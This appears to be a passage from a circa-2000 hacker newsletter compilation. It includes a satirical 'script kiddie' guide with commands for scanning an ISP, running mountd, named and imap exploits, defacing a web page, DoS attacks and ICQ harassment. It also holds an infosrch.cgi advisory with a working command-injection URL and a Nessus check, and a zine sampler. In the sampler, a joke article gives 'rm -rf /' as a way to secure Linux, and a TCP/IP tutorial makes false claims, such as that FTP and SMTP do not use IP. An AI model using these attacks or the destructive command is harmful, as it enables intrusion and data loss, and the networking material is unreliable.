      JLKADJFLK;ASDFJLKSA;DJFLASK;DFJSLAKFJLAKSDFJLASKFJDLSKDJF
      
      * tools *
      mountd remote exploit code
      named remote expliot code
      imap remote exploit codes 
      wu-ftpd remote exploit code
      Security Scanner. SSCAN by JSBACH
      listen remote exploit code
      q-pop remote exploit code
      ICQ bomber & flooder source code
      Denial Of Service code
      BitchX 
      BitchX War Scripts
      * tools EOF *
      
      
      * general idea *
      Cause as much trouble with the tools you have as posible
      figure out what each tool does and how / why it works
      overall have fun with people and concider yourself better
      than them because you can use teardrop.c to freeze their windows 
      computer or ADMmountd.c to break into their elite red hat 5.1 box
      
      * getting started *
      to get started first you have to be a able to walk ,
      being able to walk is relative to this as being able to move around
      your operating system. if you are "hacking" from a linux box [ YAY ]
      then these commands will help you.
      
      mkdir = creates a dir
      mv = move , rename
      cp = copy
      rm = remove 
      id = shows you who you are
      w  = shows you who's logged in
      tail -f = lets you watch a file as text is added to it in real time 
      echo = add's text to a file 
      cd = changes your directory 
      
      those are some of the basic's now you should be able to get started.
      
      ===============================================================================
      
      HOT TIP: make a dir in your base directory called .anythingsecret
      the . makes it not able to be shown to a regular ls , kind of hides it.
      
      HOT TIP: put all your "hacking" files in that .anythingsecret DIR 
      keep everything clean and in order and it will be a ton easier to keep
      your thoughts 2gether and in the long run you may have more "r00t shellz" 
      
      -----------------------------------------------------------------------------
      "r00t shellz" : in my earlier days i was told by someone who had
      been  on the scene for a long time , longer than i had that "root shells"
      are pretty much what you judge your eliteness on. 
      ------------------------------------------------------------------------------
      
      There are NO rules to being a script kiddy ,
      and NO morlas are enforced upon you ,
      your actions are your actions ,
      and what you see fit to do will always be looked at by others and judged.
      
      ------------------------------------------------------------------------------
      
      I want to..
      A] hack shit now.
      B] get on IRC and learn more before i continue my life as a script kiddy
      C] change my mind and go get a sparc and be a real haxor
      
      if you said A then you have the mentality it takes to be a true script
      kiddy and im not going to hold you back any longer .. lets get started on
      talking about how to break into those krad red hat systems...
      
      If you just want to hack ANY computer on any network
      then i suggest just letting your Security Scanner scan
      for a long time and then picking the computers out of your 
      scanners log file that look like you would be able to gain access to the
      easiest. [ mountd / named / imap ] 
      
      If you are using SSCAN (tm) JSBACH, and are ready to hack some shit NOW.
      then start SSCAN running on some small town ISP..
      
      ie:
      home@linux# ./sscan localisp.com/24 >> hot.list &
      
      
      once the scanning has completed then use your favorite word editor [PICO@#%]
      and read the file.. look for where SSCAN has told you that a server is
      mountd/imap/or named overflowable.. and then just try all the servers
      listed with the exploit that it is listed for... surely after a while one
      will work.. even the sun shines on a cluebie script kiddy's ass some day.
      
      [ gcc -o rotshb rotshb.c ]
      ./rotshb server.com 4 1
      
      [ gcc -o mountd ADMmountd.c ]
      ./mountd server.com
      
      [ gcc -o imapk1ller imapexploit.c ]
      ./imapk1ller host.com offset
      
      you will now when your exploit worked and when you have root ,
      and you will probally get a funny little feeling , kind of an exited
      feeling that will be your motovation to do this again.. 
      
      now once you have root you are ready for the beef of a script kiddys
      life....
      
      changing HTML.. a script kiddy changes HTML in many ways for many
      reasons.. the funnier hacks i have seen are hacks that are supose to be
      serious in which script kiddys voice their opinions on varios things ..
      from the soup at school not tasting good to the government just any
      opinion that they have in thier little brains .. 
      
      [ find / -name index.html ]
      root@hackedbox# echo " i own you " >> /home/httpd/html/index.html
      
      now that you have defaced your first web page , get on IRC and brag about
      it , as a script kiddy its something that you HAVE to do.. 
      
      load up BitchX and your War Script [ Civic.bx ] and head on over to
      TeenChat on EFNET.. scroll the URL to the page you just "hacked" and if
      anyone says anything negative to you say " Shut Up Bitch I Own You "
      and nuke them with /teardrop or any other elite d.o.s alias your war
      script may have.. you are now on your way to being a super ereet script
      kiddy.. by now you have probally allready caused a stir in the underground
      and JP from AntiOnline.com is going to interview you because you hacked
      the first jewish server that was ever ran off linux .. and now the pope
      thinks you are the anti-christ and has been talking about you as an evil
      haxer all week on the news.. JP see's a chance to exploit you and make
      money off your teen ignorance and does so in a gracefull manor.
      
      now your ego is larger then your IQ ,
      you know how to root a server ,
      you know how to D.o.S anyone on IRC ,
      you are confident ,
      you are clueless ,
      you think you are a god ,
      you have younger want to be script kiddys worshiping you ,
      you are in the pinacle of your script kiddy life ,
      
      now take your ICQ flooders / bombers and herass everyone on your ICQ list
      for no obvious reason..
      
      you are now a Script Kiddy .. enjoy your new life of stupidity...
      
      in about a year you will realize that being a script kiddy is nothing but
      a waste of time.. and sure you have learnt your way around linux like a
      small town with only once street to pick up hookers , but you still have a
      long way to go before you are corprate material.. and once you decide
      computers are your dream and thats what you want to do for the rest of
      your life you notice that you wasted the last year and a half  being a
      script kiddy .. inflating your teen ego .. hurting lil web servers for no
      reason other than the thrill of the hack.. heh
      
      
      ---- another uselss rant by DrHamstuh
      --
      Unwritten man page:
      Understanding Linux thru better medication
      Maintained by Timothy Oleary
      
      @HWA      
      
160.0 nfoSrch.cgi vulnerable to remote command execution
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by: ethO
      
      xploit:
      
      The following URL will exploit this vulnerability:
      http://www.example.com/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id
      
      And experiment with variations thereof...
      
      

      #
      # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
      #
      # See the Nessus Scripts License for details
      #
      
      if(description)
      {
       name["english"] = "infosrch.cgi";
       name["francais"] = "infosrch.cgi";
       script_name(english:name["english"], francais:name["francais"]);
       
       desc["english"] = "The 'infosrch.cgi' cgi is installed. This CGI has
      a well known security flaw that lets anyone execute arbitrary
      commands with the privileges of the http daemon (root or nobody).
      
      Solution : remove it from /cgi-bin.
      
      Risk factor : Serious";
      
      
       desc["francais"] = "Le cgi 'infosrch.cgi' est install. Celui-ci possde
      un problme de scurit bien connu qui permet  n'importe qui de faire
      executer des commandes arbitraires au daemon http, avec les privilges
      de celui-ci (root ou nobody). 
      
      Solution : retirez-le de /cgi-bin.
      
      Facteur de risque : Srieux";
      
      
       script_description(english:desc["english"], francais:desc["francais"]);
       
       summary["english"] = "Checks for the presence of /cgi-bin/infosrch.cgi";
       summary["francais"] = "Vrifie la prsence de /cgi-bin/infosrch.cgi";
       
       script_summary(english:summary["english"], francais:summary["francais"]);
       
       script_category(ACT_ATTACK);
       
       
       script_copyright(english:"This script is Copyright (C) 2000 Renaud Deraison",
                      francais:"Ce script est Copyright (C) 2000 Renaud Deraison");
       family["english"] = "CGI abuses";
       family["francais"] = "Abus de CGI";
       script_family(english:family["english"], francais:family["francais"]);
       script_dependencie("find_service.nes");
       script_require_ports("Services/www", 80);
       exit(0);
      }
      
      #
      # The script code starts here
      #
      
      if(is_cgi_installed("infosrch.cgi"))
      {
       port = get_kb_item("Services/www");
       if(!port)port = 80;
       {
        soc = open_sock_tcp(port);
        if(soc)
        {
      
         req = string("GET /cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|/bin/id HTTP/1.0\r\n");
         agent = string("User-Agent: Nessus\r\n\r\n");
         data = req + agent;
         send(socket:soc, data:data);
         rep = recv(socket:soc, length:4096);
         if("uid=" >< rep)security_hole(port);
         close(soc);
        }
       }
      }
      
      @HWA       

161.0 New magazine sampler: b0g #2
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Source:http://packetstorm.securify.com/mag/b0g/b0g-2.txt
      
      
      
      This is the February 2000 Issue.
      
            
      Official b0g site: http://www.b0g.org
      (Ed's note: site was down at time of writing, looks like someone
      didn't pay their bills...)
      
      Contact: irc in #k-rad on undernet
      By email: b0g@b0g.org
      Contributions can be sent to contribute@b0g.org

      
      * Formatting is AS-IS from the download site, unmodified.
      
      ---------------------------------------------------------------------
      
      
                           _________________________________________
          .-. _ .-.       /                                         \
          | _____ | . o O| you make everyone else seem less perfect.|
         (   @ @   )      \________________________________________ /
          \       /
           \ --- /
             | |
          ---   ---
        |  i     i  |
      
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g!#@!b0g!# b0g w0rld d0minati0n! - br0therh00d 0f gimps g!#@!b0g!#@!
      b0g!#@!b0 the b0g newsletter! issue 2! February 2000! ph33r! @!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g  @!b0g!#000   #@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@   g!#@!b0g!#@!
      b0g  @!b0g!#0      @!b0g!#@!b0g!#   0g!#@  0g! @!b0g!       #@!b   #@!
      b0g  @!b0g!#0   g   !b0g!#@!b0g!#   0g!#@  0g  @!b0g  @!b0g  @!b   #@!
      b0g  @!b0g!#   0g!   b0g!#@!b0g!#   0g!#   0g  @!b0 !#@!b0g! @!b   #@!
      b0g  @    !#   0g!   b0g       !#   0g           b g!#   0 !# !b   #@!
      b0g        #   0g!   b0        !#   0g           b g!# !b  !# !b   #@!
      b0g   !b   #   0g!   b0   @!   !#   0g!#  b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0g!#  b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0g!# !b0  #@!b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#   0           !b g!  !b0 !# !b   #@!
      b0g  @!b0  #   0g!   b   #@!b  !#@!b0           !b g!  !b0 !# !b0g!#@!
      b0g  @!b   #   0g!   b0   @!   !#@!b0g!  !b  !#@!b g!  !b  !# !b0g!#@!
      b0g   !    #    g    b         !#   0g! @!b  !#@!b g!#        !b   #@!
      b0g        #@       !b0        !#   0g! @!b g!#@!b0 !#@!b0g!#@!b   #@!
      b0g!#@!b0g!#@!b   #@!b0g!#@!b  !#@!b0g!#@!b0g!#@!b0  #@!b0g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0 !#@!   !#@!b0g!#@!b0g!#@!b0g       !#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0        !#@!b0g!#@!b0g!#@!b0g!#    g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0       g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ :::::::::::::::::::::::: Table of contest! ::::::::::::::::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ]
      [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::: Guide to TCP/IP - redpriest - priest@hack3r.com ::::::::: ]
      [ b0g article # 3 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: Sex0r guide - k-rad-bob - 808@c2i.net ::::::::::::: ]
      [ b0g article # 4 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Shell fun - some g1mp - abuse@microsoft.com ::::::::::: ]
      [ b0g article # 5 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: TCL Guide - Prae - prae@talk21.com ::::::::::::::: ]
      [ b0g article # 6 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Obscene log - #gaydogsex - irc.undernet.org :::::::::: ]
      [ b0g article # 7 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::::::: grannanizing - Prae - prae@talk21.com ::::::::::::: ]
      [ b0g article # 8 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::: Satanism  - Vegtam  - vegtam@fjell.online.no ::::::::: ]
      [ b0g article # 9 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: Negr/OS - dialect - dialect@home.com ::::::::::::: ]
      [ b0g article # 10 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::::::::: irc quotes - misc - irc.undernet.org ::::::::::::: ]
      [ b0g article # 11 ::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ ::::::::: notes from the editor  k-rad-bob  808@c2i.net :::::::: ]
      
      
      
      
      
      
      
      This months issue is sponsored by Kurder King! [ eat a turkey! ]
          [ if you cant see the image properly, squint your eyes!@$ ]
      
                        ___    __waaaaxx|x_w___,    _                       
                  .._?^-_auZ*"^^Ou         =]  =       "'_=                 
                _/`x_xd&?`l       .ll_________ l          ."_,x             
             __`|jdU7^      l_uOO3O3O33OO4UGa_UO"34s_l      =|"\,x          
           _^`_dO?~     l_||u4O3333333O333333OOO|l |33ns.x     =0",u        
         _+ |dU?`     _j-|OOO333O3O3O333O3O3O333?l_jO3O33:       =3J_       
       -pu|d4Y      _3+l4O3333O3333O33O3333O3O%3?"~         __ __   l\l     
      _-_X4X^     lx?l|O333O3333O3333]"?"-l      __auO44 OOO2%34Oi   -x+    
      lxX4<      03Ol|43O3O33O%?~-     __aZ4n_,  44O2    3OO  0OOi      M   
      jOOM       xO3|4O2"~ll.   __ __  |4O3??4O. 4XO3aud 34OndOX         4< 
      OO<       -?"-l=   __  OOO2%34Oi |dOG  44i 4XOX    OOO73OOOs.       J=
      O]           _aa  j3OX 3OO  0OOi |dO3 ldO< 4dOnaaa 3OO; "*33P-      .4
      X|      ljO  %OO  |dO3 34OndOX   |dO3aXOO< 4XOO42% mX3               0
      } _a3  _jOO  %OO  j3O3 OOO73OOOs."33OO]?'         __u4OOOOOOOOC;      
      l 4OO _UOO  -%OO  |dO2 3OO; "*33P- -~- - __ud2  _wZO4OOOX3333O]+      
      : OOOO4OOn.  %OOs.jOO  mX3`     a_a_l   |jOOO3  dOOOO2                
      l OOO%?OOOOn  4OOO42P     aju=  OOOOOX=- =|4OO :%OOOOO  |uu3OOO2;     
      l OOO] ""4OO    -0___u uOO3Oc  OOOOOOOG=3xOOOC OOOOO%  MXOXOOO3;      
      : OOON   ""-    qd4O4s 4OOOOc  OOOOOOOOOgd3OOC OOOOOOi   0|OOO3;      
      i M^l   __a%<  w4OOOm~ 4OOOOc  OOOO33OOO3OOOOC "OOOOOOXuuO4OOOr!      
      i      O4OO3; jOOOO7^  4OOOOc  OOOO] *3OOOOOOC  ""X3OOOOOOO37~        
      X      OOOO3=dOOOOE    4OOOOc  OOOO]   *OOOOOC      "~~~~ll    >*s.qi]
      Ow|    OOOOOOOOOOi.    4OOOOc  OOOO]   - M333`                3:>VxHEl
      O4;.   OOOOOOOOOOOG;O. 4O3OOc  OOO2-     .-- _a]%O333~?O3:  jq_,=    0
      O44_=  OOOO3;"XOOOOOZ; OOOO3-       =l_j|dOO3O33333vWlx]` |_ZO44Zo_0uw
      OOO4;. OOOO3; lMOOOOO] X^~l    __u33OOO3OO333O33OO+l_%3  _jO4O4O4O% 4:
      4ZO44z OOOO3;   l"??~    __uO3333333O333333O333Ov`_j%l  _dOO4O4O4;.J' 
      ,-34O{ OOO3+`    = __x333OOO3333O3O3333O3O3333]0jx?l|-_jUO4O4O42-_x   
         ]4cJ?-__       ]3O33O33333O3O3333O3O333O]%x3^l  |3j44O4O4O4+` ]    
        .|*\ud444Gw_      -]3O3O3O33333O3O3333OO%^~     _dO4OO4O4O7'=       
           u*M4OOO44Ga__| -     u-~~?^?""~--O|     l__d444O4O4OX7`]         
             x~M4O4O4O44Gna__ll=               __au4UU44O4O442?`            
               = "*34O4OO4OO4444guaaaaaawaauZO444OO4OOO4O4O?-               
                    0"?*OO4O4OO4O4OOOO3O4444OO4O4O4O4X3?~`                  
                         ""?*3XOO4O4OO4OO4OO44OX37?^`
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 1 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::::: Securing Corel Linux - Prae - prae@talk21.com ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
      This detailed guide on how to secure Corel Linux is all you will ever 
      need
      to read...
      
      Here is what we do:-
      
      First, login as root. Your prompt should look something like this:
      
      
      [root@localhost ~]$
      
      
      Then start with these simple commands
      
      
      [root@localhost ~]$ rm -rf /
      [root@localhost ~]$ reboot
      
      
      And thats all you need to know about securing corel Linux!
      
      
      
      
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      [ b0g article # 2 :::::::::::::::::::::::::::::::::::::::::::::: b0g ]
      [ :::::::: Guide to TCP/IP  redpriest - priest@hack3r.com ::::::::: ]
      [ :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: ]
      
      
      
              Ok TCP/IP is a software based communications protocol used in 
      networking. 
      
      Although the name may appear to be a entire combination of just two 
      protocols, The term refers not to a single entity combining two 
      protocols but rather a set of software programs that provide network 
      services such as the many things you use on the Internet today (Remote 
      login, FTP, And e-mail)
      
      Although those are the basic services that the protocol suite provides 
      that isn't the boundaries many other things use tcp/ip to communicate, 
      TCP/IP basically provides a method of transferring information from 
      one computer to another.
      
      TCP/IP has protocol's to handle error correction, Manage the routing 
      and delivery of data and control the actual transmission. And many 
      other things you will find out later in this lecture.
      
      Despite the fact that tcp/ip is an open protocol many companies around 
      the world have modified it for there own networking system. You should 
      be careful in choosing to modify it because it needs to be combatable 
      with hardware and software and can cause problems
      
      TCP/IP is very often referred to as an Internet architecture because 
      TCP/IP and the Internet are closely woven
      
      The Internet was originally proposed by the precursor of DARPA, called 
      (ARPA) Advanced research projects agency, as a method of testing the 
      viability of packet-switching networks, During the tenure with the 
      project , ARPA foresaw a network of leased lines connected by 
      switching nodes. The network were to be named ARPANET, And the 
      switching nodes were named Internet message processors. (IMP'S)
      
              
      After so they developed a "Remote login" protocol/feature it was 
      called the (NCP) Network Control Program, Later on Electronic mail was 
      added through the File transfer protocol (FTP)
      
      After this many events occurred but there isn't the bandwidth to tell 
      them here and they have almost no importance to explain here..
      
      As ARPANET grew out of being a military only network, Other companies, 
      universities, corporations and to user community's it became 
      known as the "Internet".
      
      Note: There is no single network called the Internet. The term refers 
      to a collective network of subnetworks, The only one thing they have 
      in common is TCP/IP
      
      Another thing that was developed later was the Domain Name System but 
      we wont get into that much i decided i would mention the . suffixes 
      and what they are Well we know most of these but i will go over them
      
      .com, Would be owned by a commercial company
      
      .net, Was meant for networks used by Internet service providers 
      
      .arpa, Was and is an ARPANET Internet identification addy
      
      .gov, Any goverment body
      
      .mil, Any military orginization
      
      .edu, Educational Institution
      
      .org, Anything that dosent fall into one of these categories.
      
      Although the suffix's were categorized into those topics today you can 
      basically register any one of them for a price,
      
      Ok here i will explain the second part of TCP/IP IP and what its all 
      about. 
      
      TCP/IP uses a 32-bit address to identify a machine on a network to 
      which it is attached. Ip addresses identify a machines connection to a 
      network, not the machine itself. An ip address is a address that users 
      commonly see on there machine/terminal and example would be 
      120.43.2.45, Which uniquely identifies that device.
      
      There are four formats for the ip address with each used depending on 
      the very size of the network. The four formats have been named the 
      Class of the ip.
      
      A through D, The class can be determined by the first three (high 
      order) bits, In fact the first two are usually enough because there 
      aren't many class D networks Ok i will explain each class.
      
      Class A addy's are for networks that have many machines on them. The 
      24 bits for the local address are needed in these cases. The network 
      is usually kept in 7 bits, Which limits the number of networks that 
      can be identified
      
      Class B addresses are usually for intermediate networks, with local 16 
      bit local or host addresses and 14 bit network addresses.
      
      Class C networks have only 8 bits for the local or host address, 
      Limiting the number of devices to 256. There are 21 bits for the 
      network addresses.
      
      Class D addresses are used for multicasting purposes, when a general 
      broadcast to more than one device is required, the lengths of the ip 
      address are chosen carefully to provide maximum flexibility in 
      assigning both network and local addresses.
      
      IP addresses are four sets of 8 bits, for a total 32bits. You often 
      represent these bits by separation with a period, So the format can be 
      thought of as network.local.local.local But for Class A 
      network.network.network.local 
      
      This is where ARP slips in (Address Resolution Protocol), ARP'S job is 
      to IP address to physical addresses (Network & Local) 
      
      Next i will explain the Internet protocol datagram header when 
      ethernet receives and IP-Assembled datagram (which includes the ip 
      header), it adds a header to the front to create a frame this process 
      is called encapsulation.
      
      One common difference between the IP and Ethernet headers is that 
      ethernets headers contain the physical address of the destination 
      machine, whereas the ip header contains the ip address
      
      This translation is performed by ARP.
      
      Note: Encapsulation is the process of adding something to the start 
      and sometimes the end of data
      
      Ok next i will cover the IP header layout this is a long ass part but 
      that will be basically it for IP next we will move onto TCP.
      
      They will be listed in order first comes 
      
      Version number, this is a 4-bit field that contains the IP version 
      number the protocol the software is using this is needed so that the 
      receiving IP software knows how to decode the rest of the header, 
      Which changes with each new release of the ip standards. The most 
      widely used version i have noticed is IPv4
      
      Although several systems are testing a version called IPng (v.4) the 
      Internet and most lan's do not support IP6 right now.
      
      Part of the protocol definition stipulates that tha receiving software 
      needs to check the version number of incoming datagrams before 
      proceeding to anylize the rest of the header. If it cannot handle the 
      Version the machine ignores the content completely
      
      Header Length, This 4-bit field reflects the total legnth of the Ip 
      header built by the sending machine. It is specified in 32 bit words. 
      The shortest header is 5 words, But use of the options thing can 
      increase it to it maximum 6 words to properly decode the header, IP 
      MUST know when the header ends and the data begins. There isn't a 
      start-of-data marker so that's why this field is included so the 
      header legnth is used to offset from the start of the ip header to 
      give off IP header.
      
      Types of service, The 8-bit (1 byte) Service field instructs how to 
      process the datagram properly. The fields 8 bits are read and 
      assigned. The first 3 bits indicate the datagrams precedence from a 
      value from 0 (normal) to 7 (network control) The higher the number the 
      more important the more import the datagram and in theorie the lower
      
      the faster it is routed.
      
      The next three bits are one bit flags that control the delay, 
      Throughput, and reliability of the datagram. If the bit is set the the 
      number 0, the setting is normal, A bit set to 1 implies Low delay and 
      high throughput and reliability for respective flags. The last two 
      bits of the fields aren't used.
      
      Datagram Length or packet legnth, This one just basically gives the 
      total legnth of the datagram including the header in bytes
      
      Next is Identification this field hold a number this is a unique 
      identify created by the sending node, this is required in reassembling 
      fragmented messages, Ensuring that the fragments of one message aren't 
      intermixed with another.
      
      Next we cover Flags, the flags are a 3 bit field, the first bit is 
      unused the remaining bits are called DF which stands for Don't 
      Fragment! and MF More fragments, which control handling of the 
      datagrams when the fragmentation is requested
      
      The DF flag is set to 1 and cant ever be fragmented if it is so the 
      packet will be returned as an error.
      
      The MF flag though is set to 1 and the current datagram is followed by 
      more packets which are reassembled to create tha full message.
      
      Next i will skip to TTL (Time to live) i wont get in depth about this 
      one because there isn't much depth to reach, This basically tells the 
      computer the time that the datagram can remain on the network before 
      the datagram is discarded
      
      Header Checksum, The number in this field of the IP header is a 
      checksum for tha protocol header field, but not the data fields to 
      enable faster processing of data fields
      
      The almost last is the Sending address and destination address, These 
      fields contain 32-bit ip addy's of the sending and destination 
      devices. This is established while the datagram is created not changed 
      during routing
      
      
      Next we cover the > EVIL < option field heh > The option field is of 
      corse optional. It is composed of several codes of variable length. If 
      more that one option is used in this datagram, the option appears 
      consecutively in the ip header. All the options are controlled by a 
      byte 
      
      This is usually divided into three fields a 1-bit copy flag a 2-bit 
      option class and a 5-bit option number... Damn im up on the typo's 
      
      Padding isn't a hard one and has a pretty simple job the content of it 
      depends on the options selected the padding is usually to ensure that 
      the datagram header is a round number of bytes
      
      
      In this lecture i will not cover IPv6 because it is a hell of a topic 
      and i wont cover ICMP packets for reasons that any advanced user will 
      know (TO goddamn big :p) I might choose to do a separated lecture y 
      never know
      
      
      Ok next we will look @ the wonderful world of TCP and UDP but first we 
      take a brake for a few minutes as you can imagine im very tired.
      
      Ok back from our brake if you didn't remember we are covering TCP and 
      UDP first i will cover alot of TCP then UDP will follow
      
      Ok we just covered IP in considerable detail i hope TCP will be also 
      this way, as you might remember, the Internet protocol handles the 
      lower-layer functionality. Right now we look at the transport layer 
      where the TCP and UDP protocols come into play
      
      TCP/IP has alot of inner protocols here i will display there names and 
      there function then move onto tcp etc..
      
      
      (UDP) User Datagram Protocol: Connectionless services
      
      
      The following are routing protocols in the TCP/IP protocol family 
      (IP) Internet Protocol: Handles transmission of information.
      
      
      (ICMP) Internet Message Control Protocol: A maintenance protocol used 
      between two systems to share status and error information
      
      (RIP) Routing Information Protocol: determines routing
      
      (OSPF) Open shortest path first: Alternate protocol for determining 
      routing
      
      The following are Network Address protocols of the TCP/IP suite, 
      remember all of these services will be explained later on in the 
      lecture.
      
      (ARP) Address Resolution Protocol: A protocol used to determine the 
      hardware address from the ip address of the destination computer
      
      (DNS) Domain Name System: Translates host names into ip one example is 
      www.hackphreak.org after a DNS request would be 206.186.182.10
      
      (RARP) Reverse Address Resolution Protocol: Required when a computer 
      must determine an ip address when it already has a physical hardware 
      address.
      
      The following is a group of user services if the TCP/IP suite.
      
      (FTP) File transfer protocol: transfers files
      
      (BOOTP) Boot protocol: Starts up a network machine
      
      (telnet): Allows remote login
      
      
      The following are the gateway protocols they will also along with all 
      others be explained at the end of the lecture
      
      (EGP) Exterior Gateway Protocol: transfers routing information for 
      external networks 
      
      (GGP) Gateway-to-Gateway Protocol transfers routing information 
      between gateways 
      
      (IGP) Interior Gateway Protocol: transfers routing information for 
      internal networks
      
      The following are the LAST types of protocols i call them the OTHER 
      group because they really cant be placed in the other groups.
      
      (NFS) Network File System: enables directories on one machine to be 
      mounted on another.
      
      (NIS) Network Information Service: Maintains user accounts across 
      networks.
      
      
      (RPC) Remote Procedure Call: enables remote applications to 
      communicate.
      
      (SMTP) Simple Main Transfer Protocol: transfers electronic mail
      
      (SNMP) Simple Network Management Protocol: Sends status message about 
      the network
      
      Ok so we got all the protocols and what they do for your reference.
      
      TCP is one of the most widely used transport layer protocols, 
      expanding from its original implementation on the ARPANET to 
      connecting commercial sites all over the world.
      
      In theorie TCP could be a very simple software routine, but i wouldn't 
      advise calling TCP simple, Why use a transport layer as complex as 
      tcp? the most important reasons depend on Ips unreliability as you 
      have seen ip dosent guarantee delivery of a datagram packet its a 
      connection less 
      
      system with no reliability IP simply handles the routing of datagrams, 
      and if a problem occurs during transfer ip just discards the packet 
      generating an ICMP error message back to the sender most people think 
      of TCP and IP as a close pair but in some instances TCP uses itself 
      without the IP protocol
      
      Like in FTP and SMTP both of which don't use IP
      
      What ip TCP? TCP provides a considerable amount of services in the IP 
      layer and the upper layer, most importantly it provides connection 
      oriented protocol to the upper layers that can be sure to the 
      application that the packet sent out of the network was received 
      entirely.
      
      So you could say TCP acts as a message validation protocol providing 
      reliable communications if a datagram is corrupt of lost tcp provides 
      retransmitting.
      
      Note: TCP is not a piece of software. its a communications protocol.
      
      You could actually think of tcp as being similar to a telephone 
      conversation. A connection is made between the source and the 
      destination this is sometimes called a virtual circuit. But files and 
      data can
      
      be transferred during the conversation like a two way phone 
      conversation. and when they are done one or both computers agree to 
      drop the conversation.
      
      Because tcp is a connection-oriented protocol responsible for ensuring 
      the transfer of datagram from the source to the destination machine 
      (end-to-end communications, TCP MUST receive communications messages 
      from the destination machine to acknowledge receipt of the datagram,
      
      The is a stream of individual characters send asynchronous. This is in 
      contrast to most protocols which use fixed blocks of data. This can 
      pose some conversation problems with applications that handle only 
      formally constructed blocks of data or insist on fixed-size messages.
      
      To better illustrate the tole of TCP we will "Follow" a message to get 
      the anoatomy of the message..
      
      The message originates from an application in an upper layer and is 
      then passed to TCP from the next higher layer in the architecture 
      through some protocol, The message is passed as a stream. 
      
      TCP receives this stream of bytes and assembles them into TCP 
      segments, or packets, In the process of assembling the segment, header 
      information is attached to the front of the data. Each segment has a 
      checksum calculated then embedded within the header
      
      as well as a sequence number if there is more than one segment in the 
      entire message. The length of the segment is usually determined by TCP 
      or a system value determined by the system administrator.
      
      If two way communications are required like FTP or Telnet, a 
      connection (virtual circuit) between the sending and receiving 
      machines is established prior to passing the segment to IP for 
      routing. This process starts with the sending TCP software issuing a 
      request for a TCP connection
      
      with the receiving machine. In the message a unique number (called a 
      socket #) that identify's the sending machines connection. The 
      receiving TCP software assigns its own unique number and sends it back 
      it to the sending machine
      
      The two unique numbers then define the connection the two machines 
      until the virtual circuit is terminated, After the virtual circuit, 
      TCP sends the segment to the IP software, which issues the message 
      over the
      
      network as a datagram IP can perform and of the changes to the segment 
      that you saw earlier, such as fragmenting it and reassembling it at 
      the destination machine, These steps are completely transparent over 
      the TCP layers however. After winding its way over the network, the 
      
      receiving machines ip passes the received segment to the recipient 
      machines TCL layer where it is processed and passed up to the 
      applications using an upper-layer protocol
      
      If the message was more than one segment long (Not ip datagrams), the 
      receiving TCP software reassembles the message using the sequence 
      numbers contained in each segment header. If a segment is missing or 
      corrupt, TCP returns a message with the faulty sequence number in the 
      body, the originating TCP software can then resend the bad segment 
      (Cool eh?)
      
      The receiving machines TCP implementation can perform a simple flow 
      control to prevent buffer overload it does this by sending a buffer 
      size called a window value to the sending machine, Following which the 
      sender can only enough bytes to fill the window, After that the sender 
      must wait for another value to be 
      
      received. this provides a handshaking protocol between the two 
      machines, although it slows down the transmission time slightly and 
      increases network traffic.
      
      I wont get into TCP timers two much. here go's some stuff on TCB and 
      flow Overflow (Overflow)
      
      TCP has alot to keep tract of, information about each connection, It 
      does this through transmission control block which contains 
      information about the local and remote socket numbers, the send and 
      receive buffers, security and priority values, and current segment 
      queue. The TCB
      
      As mentioned earlier TCP must communicate with IP in the layer below 
      and applications in the upper layer. TCP must also communicate with 
      other TCP implementations across networks. To do this, it uses 
      Protocol Data Units (PDUs), which are called segments in TCP parlance
      
      The following is a layout of one of those units
      
      The different fields are as follows
      
      * Source port: A 16-bit field that identifies the local TCP user 
      (usually an upper-layer application program).
      
